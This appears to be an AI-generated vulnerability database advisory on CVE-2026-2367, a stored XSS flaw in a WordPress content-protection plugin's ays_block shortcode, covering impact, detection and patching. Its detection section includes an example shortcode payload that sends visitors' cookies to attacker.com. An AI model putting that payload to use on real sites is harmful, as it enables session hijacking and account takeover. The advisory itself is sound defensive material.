
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2367 is a Stored Cross-Site Scripting (XSS) vulnerability in the Secure Copy Content Protection and Content Locking WordPress plugin by ays-pro. It affects all versions up to and including 5.0.1, and arises from insufficient input sanitization and output escaping on user-supplied attributes in the ays_block shortcode. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages, which execute whenever any user visits the affected page. It was published on February 25, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code paths are located in the plugin's public-facing class (class-secure-copy-content-protection-public.php) at lines 718 and 1043, where attributes passed to the ays_block shortcode are rendered without adequate sanitization or escaping (WordPress Trac, WordPress Trac). An attacker with at least contributor-level WordPress access can craft a post or page containing a malicious [ays_block] shortcode with injected JavaScript, which is then stored in the database and executed in the browsers of any visitor. No special server-side configuration is required beyond having the plugin installed and active (Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user who visits an injected page, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims (including administrators), and defacement of site content. If an administrator visits the injected page, the attacker could escalate privileges, install malicious plugins, or fully compromise the WordPress site. Confidentiality and integrity are both impacted (low to moderate), while availability is not directly affected (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-2367 as of the available data. The EPSS score is approximately 0.03% (0.000300), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).
[ays_block] shortcode with an unsanitized attribute containing a JavaScript payload, e.g., [ays_block attribute="\"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API containing ays_block shortcode with unusual attribute values including HTML tags or JavaScript.wp_posts table entries containing [ays_block shortcodes with embedded <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads in post content.[ays_block] shortcodes, potentially carrying cookie or session data in query parameters.wp-content/plugins/secure-copy-content-protection/ if an attacker escalated to file write access following XSS exploitation.Update the Secure Copy Content Protection and Content Locking plugin to version 5.0.2 or later, which includes the fix applied in changeset 3463092 (WordPress Trac Changeset). As a workaround prior to patching, restrict contributor-level user registrations and limit the ability of untrusted users to publish or submit content containing shortcodes. Site administrators should also review existing posts and pages for unexpected [ays_block] shortcode usage with suspicious attributes. Enabling a Web Application Firewall (WAF) with XSS rules (e.g., Wordfence) can provide additional detection and blocking capability (Wordfence).
The vulnerability was discovered and reported by Wordfence, which published the advisory on February 25, 2026. No significant broader media coverage, notable researcher commentary, or social media discussion has been identified beyond standard vulnerability aggregator listings (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."